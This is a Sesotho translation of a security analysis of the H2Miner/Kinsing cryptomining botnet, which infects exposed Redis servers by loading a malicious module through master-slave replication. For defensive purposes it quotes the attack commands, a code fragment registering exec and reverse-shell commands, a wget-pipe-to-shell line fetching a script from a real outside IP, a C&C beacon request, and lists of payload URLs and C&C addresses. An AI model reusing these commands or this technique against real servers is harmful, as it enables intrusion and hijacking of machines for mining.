Letsatsi le fetileng, e 'ngoe ea li-server tsa morero oa ka e ile ea hlaseloa ke seboko se tšoanang. Ho batla karabo ea potso e reng "e ne e le eng?" Ke fumane sengoloa se setle ke sehlopha sa Alibaba Cloud Security. Kaha ha kea fumana sengoloa sena ho Habré, ke nkile qeto ea ho se fetolela ka ho khetheha bakeng sa hau <3
ho kena
Haufinyane tjena, sehlopha sa ts'ireletso sa Alibaba Cloud se fumane ho phatloha ka tšohanyetso ha H2Miner. Mofuta ona oa seboko se kotsi o sebelisa ho hloka tumello kapa li-password tse fokolang bakeng sa Redis e le menyako ea lits'ebetso tsa hau, ka mor'a moo e hokahanya module ea eona e mpe le lekhoba ka ho hokahanya ha master-slave 'me e qetelle e khoasolla module ena e mpe mochining o hlasetsoeng ebe e etsa hampe. ditaelo.
Nakong e fetileng, litlhaselo ho litsamaiso tsa hau li ne li etsoa haholo-holo ho sebelisoa mokhoa o amanang le mesebetsi e reriloeng kapa linotlolo tsa SSH tse neng li ngotsoe mochini oa hau kamora hore mohlaseli a kene ho Redis. Ka lehlohonolo, mokhoa ona o ke ke oa sebelisoa hangata ka lebaka la mathata a taolo ea tumello kapa ka lebaka la mefuta e fapaneng ea sistimi. Leha ho le joalo, mokhoa ona oa ho kenya mochine o kotsi o ka phethahatsa litaelo tsa mohlaseli ka ho toba kapa oa fumana monyetla oa ho kena ho khetla, e leng kotsi bakeng sa tsamaiso ea hau.
Ka lebaka la palo e kholo ea li-server tsa Redis tse tšoaretsoeng Marang-rang (hoo e ka bang limilione tse 1), sehlopha sa ts'ireletso sa Alibaba Cloud, joalo ka khopotso e mosa, se khothaletsa basebelisi hore ba se ke ba arolelana Redis inthaneteng mme khafetsa ba lekola matla a li-password tsa bona le hore na ba senyehile. kgetho e potlakileng.
H2Miner
H2Miner ke botnet ea merafo bakeng sa lits'ebetso tse thehiloeng ho Linux tse ka hlaselang sistimi ea hau ka mekhoa e fapaneng, ho kenyelletsa ho hloka tumello ho khoele ea Hadoop, Docker, le Redis remote command execution (RCE) bofokoli. Botnet e sebetsa ka ho khoasolla mangolo a kotsi le malware ho rafa data ea hau, ho holisa tlhaselo ka mokhoa o otlolohileng, le ho boloka likhokahano tsa taelo le taolo (C&C).
Redis RCE
Tsebo mabapi le taba ena e ile ea arolelanoa ke Pavel Toporkov ho ZeroNights 2018. Ka mor'a phetolelo ea 4.0, Redis e tšehetsa karolo ea ho kenya li-plug-in e fanang ka basebelisi matla a ho laela kahoo lifaele tse hlophisitsoeng le C ho Redis ho phethahatsa litaelo tse khethehileng tsa Redis. Ts'ebetso ena, leha e le molemo, e na le ts'oaetso eo ho eona, ka mokhoa oa master-slave, lifaele li ka hokahanngoang le lekhoba ka mokhoa o felletseng oa resync. Sena se ka sebelisoa ke mohlaseli ho fetisetsa lifaele tse lonya. Kamora hore phetisetso e phetheloe, bahlaseli ba kenya mojule ketsahalong e hlasetsoeng ea Redis mme ba phethe taelo efe kapa efe.
Malware Worm Analysis
Haufinyane tjena, sehlopha sa ts'ireletso sa Alibaba Cloud se fumane hore boholo ba sehlopha sa H2Miner sa morafo o kotsi se eketsehile ka tšohanyetso. Ho latela tlhahlobo, ts'ebetso e akaretsang ea tlhaselo ke e latelang:
H2Miner e sebelisa RCE Redis bakeng sa tlhaselo e felletseng. Bahlaseli ba qala ho hlasela li-server tsa Redis tse sa sireletsehang kapa li-server tse nang le li-password tse fokolang.
Ebe ba sebelisa taelo config set dbfilename red2.so ho fetola lebitso la faele. Ka mor'a sena, bahlaseli ba phethahatsa taelo slaveof ho seta aterese ea moamoheli ea pheta-phetoang ea lekhoba.
Ha ketsahalo ea Redis e hlasetsoeng e theha khokahano ea makhoba le Redis e mpe eo e leng ea mohlaseli, mohlaseli o romela mojule ea nang le tšoaetso a sebelisa taelo e felletseng ea ho hokahanya lifaele. Joale file e red2.so e tla kopitsoa mochining o hlasetsoeng. Joale bahlaseli ba sebelisa ./red2.so loading module ho kenya faele ena. Mojule o ka fana ka litaelo tse tsoang ho mohlaseli kapa oa qala khokahano e ka morao (backdoor) ho fumana mochini o hlasetsoeng.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Kamora ho phethahatsa taelo e mpe joalo ka / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, mohlaseli o tla tsosolosa lebitso la faele ea bekapo ebe o laolla module ea sistimi ho hloekisa mesaletsa. Leha ho le joalo, file ea red2.so e ntse e tla lula e le mochining o hlasetsoeng. Basebelisi ba eletsoa ho ela hloko boteng ba faele e belaetsang joalo foldareng ea mohlala oa bona oa Redis.
Ntle le ho bolaea lits'ebetso tse mpe tsa ho utsoa lisebelisoa, mohlaseli o ile a latela mongolo o mobe ka ho jarolla le ho sebelisa lifaele tse mpe tsa binary ho. . Sena se bolela hore lebitso la ts'ebetso kapa lebitso la bukana le nang le kinsing ho moamoheli le ka bonts'a hore mochini o tšoaelitsoe ke vaerase ena.
Ho latela liphetho tsa morao-rao tsa boenjiniere, malware haholo-holo e etsa mesebetsi e latelang:
- Ho kenya lifaele le ho li kenya
- Merafo
- Ho boloka puisano ea C&C le ho phethahatsa litaelo tsa bahlaseli
Sebelisa masscan bakeng sa skena sa kantle ho holisa tšusumetso ea hau. Ho phaella moo, aterese ea IP ea seva sa C & C e ngotsoe ka thata lenaneong, 'me moeti ea hlaseloang o tla buisana le seva sa puisano sa C & C a sebelisa likōpo tsa HTTP, moo boitsebiso ba zombie (seva e senyehileng) bo khetholloang sehloohong sa HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Mekhoa e meng ea tlhaselo
Liaterese le likhokahano tse sebelisoang ke seboko
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tlhahiso
Ntlha ea pele, Redis ha ea lokela ho fumaneha Inthaneteng 'me e lokela ho sireletsoa ka password e matla. Hape ke habohlokoa hore bareki ba hlahlobe hore na ha ho na faele ea red2.so bukeng ea Redis le hore ha ho na "kinsing" lebitsong la faele / tshebetso ho moamoheli.
Source: www.habr.com